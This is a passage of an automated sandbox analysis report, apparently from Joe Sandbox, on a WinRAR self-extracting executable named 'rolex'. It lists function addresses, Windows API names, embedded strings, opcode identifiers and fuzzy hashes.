                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: File
                                                                                • String ID:
                                                                                • API String ID: 749574446-0
                                                                                • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                • Instruction ID: 057a9eaf41c1aa1967225c4e62ce04adccd04123fd215cde2b2eab783c495bc0
                                                                                • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                • Instruction Fuzzy Hash: 2EE0C256B2251582EF60BB3FC852638A360EF8CF84BCA5030CE4C07731CE28D4818A10
                                                                                Function 00007FF7AB4A2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID:
                                                                                • API String ID: 3081899298-0
                                                                                • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction ID: 38ba0cfd4eab6ac18cd7e6731d735f23b3f6cf24af9ec2548bfc570650d7e417
                                                                                • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction Fuzzy Hash: 19D01212D0B45192DD50A73E9C5103C6354AF92735FE50730D63E816F1CE1D9496B321
                                                                                Function 00007FF7AB4D7610 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: d905035bd3ffed0fa3d42b0ba6c84558746c8bc0c2d9d26789c142ff972459f6
                                                                                • Instruction ID: a2b4f460c402dde674d49dac5215abd18bcef6de18a9f73069d5e46e98e36ffc
                                                                                • Opcode Fuzzy Hash: d905035bd3ffed0fa3d42b0ba6c84558746c8bc0c2d9d26789c142ff972459f6
                                                                                • Instruction Fuzzy Hash: 0BD09E9AD1B90685F785BB19E8953349360BF59B69FC30634C50D061728F7D3098C720
                                                                                Function 00007FF7AB4A7FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction ID: 3f142954e22c00b8465e0e5c7451f58f9a2de636ebbd6c4bbefd4879f67fa5aa
                                                                                • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction Fuzzy Hash: 04C08C20F07502C1DA086B2AC8C902813A4BB40B08BE28039D10C81131CE2CC5EA9359

                                                                                Non-executed Functions

                                                                                Function 00007FF7AB4A5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1693479884-0
                                                                                • Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                • Instruction ID: 464f7fa508ea176e171905ba5c4f11d8d3f706c9cf93d82546e7bc93ed2fa9ca
                                                                                • Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                • Instruction Fuzzy Hash: A9A1C2B2F16B5285FE00AB7D99441BDB321AF45BA4B954239DE2D17BF9DE3CE0418310
                                                                                Function 00007FF7AB4BA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                • API String ID: 431506467-1315819833
                                                                                • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                • Instruction ID: 39926c30a7586e70207bccbef04536081890a7a99b51f3ab28dbfedc03cf35f2
                                                                                • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                • Instruction Fuzzy Hash: CFB19E62F1A78285FB00ABBCD4442BCA372AB45794F814235DB5C26AFADF7CE545C360
                                                                                Function 00007FF7AB4BF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                • String ID: STATIC
                                                                                • API String ID: 781704138-1882779555
                                                                                • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction ID: 284c764f0d466261b0feddecc175eca5698cb960e0961d26a266cd8bd70e2bfd
                                                                                • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction Fuzzy Hash: F431E822B0A65246FA64FB6DA5547B9A391FF98BC0F820030DE4D07B76DF3CE4028760
                                                                                Function 00007FF7AB4C5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2889003569-2084237596
                                                                                • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction ID: 8998b5ee85b79c6fe224e7dddc9c1b5144022e4ba59beb653ba88cd573e8993d
                                                                                • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction Fuzzy Hash: DD91B073A0AB918AE710EF69E4412ADBBA0F705B88F514139EE8C17775DF38D195CB10
                                                                                Function 00007FF7AB4B7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Rect
                                                                                • String ID: RarHtmlClassName
                                                                                • API String ID: 2396740005-1658105358
                                                                                • Opcode ID: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction ID: b9730491bdf1396dfe108dca90f5dffe8698893baafa3870ca93f6a92f87b780
                                                                                • Opcode Fuzzy Hash: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction Fuzzy Hash: 5651752260A7418AEA24AB69E44437AE361FF89B80F864435DF8E47B75DF3CE0458B10
                                                                                Function 00007FF7AB4BFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                • String ID: sfxcmd$sfxpar
                                                                                • API String ID: 3540648995-3493335439
                                                                                • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                • Instruction ID: 948467ed855687e2852745a56d7fc92b4d9a24e5634073913548aa778d5d444b
                                                                                • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                • Instruction Fuzzy Hash: 3831AF32A16A4584EB00ABADE4841BCB371FB48B88F910131DF5E577B9DF38D052C364
                                                                                Function 00007FF7AB4CF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction ID: 2fbe1b8b7a688f7f670f32151e9d028e399654a50d563df9607f282af0a72573
                                                                                • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction Fuzzy Hash: 3A412621B0BA1291FA16AF5EA8006B5E395BF15FD8F8B4535DE1D4B774EE3CE4088360
                                                                                Function 00007FF7AB4C625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: __except_validate_context_recordabort
                                                                                • String ID: csm$csm
                                                                                • API String ID: 746414643-3733052814
                                                                                • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction ID: 301dab6349409c236298638ad1ea73483afa2a51f1a7ccb0e51f4703077c58f7
                                                                                • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction Fuzzy Hash: 2A71D07250A6918AE760AF29905077DFBA0EB06F88F86C136DA4C47AB5CB3CD491C754
                                                                                Function 00007FF7AB4D4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction ID: 6ceb2bdcd2b957fdba7ec1925ebdc665cbe02e59c379642f9973d03acc6d294a
                                                                                • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction Fuzzy Hash: 4F41C33271AA9182DB50DF69E4443B9A760FB88794FC24031EE4D877A4DF7CD441C750
                                                                                Function 00007FF7AB4CDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction ID: 6381581287e2911203499482feb2f7c89e5bddc1d2cdc3985a4eef5b0e9909cb
                                                                                • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction Fuzzy Hash: 2241B832A0EA4246F761AF189040379E2A0EF82F90F964131DB5D47AFBDF7CE4618720
                                                                                Function 00007FF7AB4D0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0B91
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0BF3
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0C2D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0C57
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction ID: fd09dad6d742dc65260bc9d1a7220837d3f1d0eebd16e193ec8f52d50f5454e7
                                                                                • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction Fuzzy Hash: 51218231A1BB5181E6A4AF1A6450029EBA5FB54FD0BC94235DE8E23BB8DF3CE4528314
                                                                                Function 00007FF7AB4CD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction ID: 50a8d5db5340a8a9c4ff4111e663ad4c8c7700b61e87881048a085f7362be146
                                                                                • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction Fuzzy Hash: EB01DE20B0BB0242FA597B2DAA45138D2A15F46F90F824838DA1E427F6ED2CB8254230
                                                                                Function 00007FF7AB49E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
